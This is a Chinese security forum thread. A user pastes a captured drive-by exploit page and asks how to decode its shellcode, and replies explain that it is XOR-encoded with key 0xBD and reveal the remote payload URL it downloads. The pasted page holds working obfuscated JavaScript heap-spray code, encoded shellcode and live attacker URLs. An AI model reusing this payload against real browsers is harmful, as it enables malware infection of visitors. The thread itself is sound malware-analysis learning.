[object]http://google8.9966.org/web2/ytfl.htm
                    [object]http://google8.9966.org/web2/ie.html
                    [object]http://google8.9966.org/web2/ff.html




<object width="550" height="400">
<param name="movie" value="done.swf">
<embed src="xp.swf" width="550" height="400"></embed></object>
<script language="JavaScript">
var memory;
var nop = unescape("%"+"u"+"0"+"8"+"0"+"8"+"%"+"u"+"0"+"8"+"0"+"8");
var %u=abcd;
var YTMTV="%ud5db%uc9c9%u87cd%u9292%udcdf%ud9d4%ud5c8%ud2dc%u938f%u8e8e%u8f8f%ud293%udacf%ude92%ud9d0%ude93%ucece%uBDBD%uBDBD10";
var spray=decodeURI("abcd5858abcd5858abcd10EBabcd4B5BabcdC933abcdB966abcd03B8abcd3480abcdBD0BabcdFAE2abcd05EBabcdEBE8abcdFFFFabcd54FFabcdBEA3abcdBDBDabcdD9E2abcd8D1CabcdBDBDabcd36BDabcdB1FDabcdCD36abcd10A1abcdD536abcd36B5abcdD74AabcdE4ACabcd0355abcdBDBFabcd2DBDabcd455Fabcd8ED5abcdBD8FabcdD5BDabcdCEE8abcdCFD8abcd36E9abcdB1FBabcd0355abcdBDBCabcd36BDabcdD755abcdE4B8abcd2355abcdBDBFabcd5FBDabcdD544abcdD3D2abcdBDBDabcdC8D5abcdD1CFabcdE9D0abcdAB42abcd7D38abcdAEC8abcdD2D5abcdBDD3abcdD5BDabcdCFC8abcdD0D1abcd36E9abcdB1FBabcd3355abcdBDBCabcd36BDabcdD755abcdE4BCabcdD355abcdBDBFabcd5FBDabcdD544abcd8ED1abcdBD8FabcdCED5abcdD8D5abcdE9D1abcdFB36abcd55B1abcdBCD2abcdBDBDabcd5536abcdBCD7abcd55E4abcdBFF2abcdBDBDabcd445Fabcd513CabcdBCBDabcdBDBDabcd6136abcd7E3CabcdBD3DabcdBDBDabcdBDD7abcdA7D7abcdD7EEabcd42BDabcdE1EBabcd7D8Eabcd3DFDabcdBE81abcdC8BDabcd7A44abcdBEB9abcdDCE1abcdD893abcdF97AabcdB9BEabcdD8C5abcdBDBDabcd748EabcdECECabcdEAEEabcd8EECabcd367DabcdE5FBabcd9F55abcdBDBCabcd3EBDabcdBD45abcd1E54abcdBDBDabcd2DBDabcdBDD7abcdBDD7abcdBED7abcdBDD7abcdBFD7abcdBDD5abcdBDBDabcdEE7DabcdFB36abcd5599abcdBCBCabcdBDBDabcdFB34abcdD7DDabcdEDBDabcdEB42abcd3495abcdD9FBabcdFB36abcdD7DDabcdD7BDabcdD7BDabcdD7BDabcdD7B9abcdEDBDabcdEB42abcdD791abcdD7BDabcdD7BDabcdD5BDabcdBDA2abcdBDB2abcd42EDabcd81EBabcdFB34abcd36C5abcdD9F3abcdC13Dabcd42B5abcdC909abcd3DB1abcdB5C1abcdBD42abcdB8C9abcdC93Dabcd42B5abcd5F09abcd3456abcd3D3BabcdBDBDabcd7ABDabcdCDFBabcdBDBDabcdBDBDabcdFB7AabcdBDC9abcdBDBDabcdD7BDabcdD7BDabcdD7BDabcd36BDabcdDDFBabcd42EDabcd85EBabcd3B36abcdBD3DabcdBDBDabcdBDD7abcdF330abcdECC9abcdCB42abcdEDCDabcdCB42abcd42DDabcd8DEBabcdCB42abcd42DDabcd89EBabcdCB42abcd42C5abcdFDEBabcd4636abcd7D8Eabcd668Eabcd513CabcdBFBDabcdBDBDabcd7136abcd453EabcdC0E9abcd34B5abcdBCA1abcd7D3Eabcd56B9abcd364Eabcd3671abcd3E64abcdAD7Eabcd7D8EabcdECEDabcdEDEEabcdEDEDabcdEDEDabcdEAEDabcdEDEDabcdEB42abcd36B5abcdE9C3abcdAD55abcdBDBCabcd55BDabcdBDD8abcdBDBDabcdDED5abcdCACBabcdD5BDabcdD5CEabcdD2D9abcd36E9abcdB1FBabcd9955abcdBDBDabcd34BDabcd81FBabcd1CD9abcdBDB9abcdBDBDabcd1D30abcd42DDabcd4242abcdD8D7abcdCB42abcd3681abcdADFBabcdB555abcdBDBDabcd8EBDabcdEE66abcdEEEEabcd42EEabcd3D6Dabcd5585abcd853DabcdC854abcd3CACabcdB8C5abcd2D2Dabcd2D2DabcdB5C9abcd4236abcd36E8abcd3051abcdB8FDabcd5D42abcd1B55abcdBDBDabcd7EBDabcd1D55abcdBDBDabcd05BDabcdBCACabcd3DB9abcdB17Fabcd55BDabcdBD2EabcdBDBDabcd513CabcdBCBDabcdBDBDabcd4136abcd7A3Eabcd7AB9abcd8FBAabcd2CC9abcd7AB1abcdB9FAabcd34DEabcdF26CabcdFA7Aabcd1DB5abcd2AD8abcd7A76abcdB1FAabcdFDECabcdC207abcdFA7Aabcd83ADabcd0BA0abcd7A84abcdA9FAabcdD405abcdA669abcdFA7Aabcd03A5abcdDBC2abcd7A1DabcdA1FAabcd1441abcd108AabcdFA7Aabcd259DabcdADB7abcdD945abcd8D1CabcdBDBDabcd36BDabcdB1FDabcdCD36abcd10A1abcdD536abcd36B5abcdD74AabcdE4B9abcdE955abcdBDBDabcd2DBDabcd455Fabcd8ED5abcdBD8FabcdD5BDabcdCEE8abcdCFD8abcd36E9abcd55BBabcd42E8abcd4242abcd5536abcdB8D7abcd55E4abcdBD88abcdBDBDabcd445Fabcd428Eabcd42EAabcdB9EBabcdBF56abcd7EE5abcd4455abcd4242abcdE642abcdBA7Babcd3405abcdBCE2abcd7ADBabcdB8FAabcd5D42abcdEE7Eabcd6136abcdD7EEabcdD5FDabcdADBDabcdBDBDabcd36EAabcd9DFBabcdA555abcd4242abcdE542abcdEC7Eabcd36EBabcd81C8abcdC936abcdC593abcd48BEabcd36EBabcd9DCBabcd48BEabcd748EabcdFCF4abcdBE10abcd8E78abcdB266abcdAD03abcd6B87abcdB5C9abcd767CabcdBEBAabcdFD67abcd4C56abcdA286abcd5AC8abcd36E3abcd99E3abcd60BEabcd36DBabcdF6B1abcdE336abcdBEA1abcd3660abcd36B9abcd78BEabcdE316abcd7EE4abcd6055abcd4241abcd0F42abcd5F4Fabcd8449abcdC05Fabcd673EabcdC6F5abcd8F80abcd2CC9abcd38B1abcd1262abcdDE06abcd6C34abcdECF2abcd07FDabcd1DC2abcd2AD8abcdA376abcdD919abcd2E52abcd598Fabcd3329abcdB7AEabcd7F11abcdF6A4abcd79BCabcdA230abcdEAC9abcdB0DBabcdFE42abcd1103abcdC066abcd184DabcdEF27abcd1A43abcd8367abcd0BA0abcd0584abcd69D4abcd03A6abcdDBC2abcd411Dabcd8A14abcd2510abcdADB7abcd3D45abcd126Babcd4627abcdA8EE"+YTMTV+"abcdBDBDabcdBDBDabcdBDBDabcdBDBDabcdBDBDabcdBDBDabcdBDBDabcdBDBDabcdBDBD");
var sss =Array(198,177,194,112,163,147,141,197,190,181,195,179,177,192,181,120,195,192,194,177,201,126,194,181,192,188,177,179,181,120,127,177,178,179,180,127,183,144,114,117,197,114,121,121,139,199,184,185,188,181,120,190,191,192,126,188,181,190,183,196,184,112,140,141,112,128,200,129,128,128,128,128,127,130,121,112,190,191,192,123,141,190,191,192,139,89,190,191,192,141,190,191,192,126,195,197,178,195,196,194,185,190,183,120,128,144,128,200,129,128,128,128,128,127,130,112,125,112,163,147,126,188,181,190,183,196,184,121,139,89,189,181,189,191,194,201,141,190,181,199,112,145,194,194,177,201,120,121,139);
var arr =new Array();
for(var ass8995=0;ass8995<sss.length;ass8995++)
{
arr[ass8995]=String.fromCharCode(sss[ass8995]-80);
}
var cc = arr.toString().replace(/,/g,"");
cc = cc.replace(/@/g,",")
eval(cc);
        for(ass8995=0;ass8995<0x600;ass8995++)
        {memory[ass8995]=nop + SC;}
</script>

想学习下解密，呵呵，谢谢 ！

用户系统信息：Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2

http://google8.9966.org/web2/ie.html
直接解下面这段shellcode，xorBD
var YTMTV="%ud5db%uc9c9%u87cd%u9292%udcdf%ud9d4%ud5c8%ud2dc%u938f%u8e8e%u8f8f%ud293%udacf%ude92%ud9d0%ude93%ucece%uBDBD%uBDBD10"
解密结果：http://baiduhao2.3322.org/cmd.css
http://google8.9966.org/web2/ff.html和ie.html上面的一样。

为什么知道是异或那个呢？BD呢？另外我用 decoder异或了，没反应......

先一次esc，第二次esc前输入密钥BD再esc即可

哦哦，那怎么知道就是使用的BD做密钥呢？另外感谢版主的耐心回答！

经验，还有就是od调试。这个shellcode里有很多bd，密钥就是bd

第一次用esc  第二次用enumxof密钥枚举可以得到 密钥为bd 并同时解出网马地址

感谢各位的耐心回答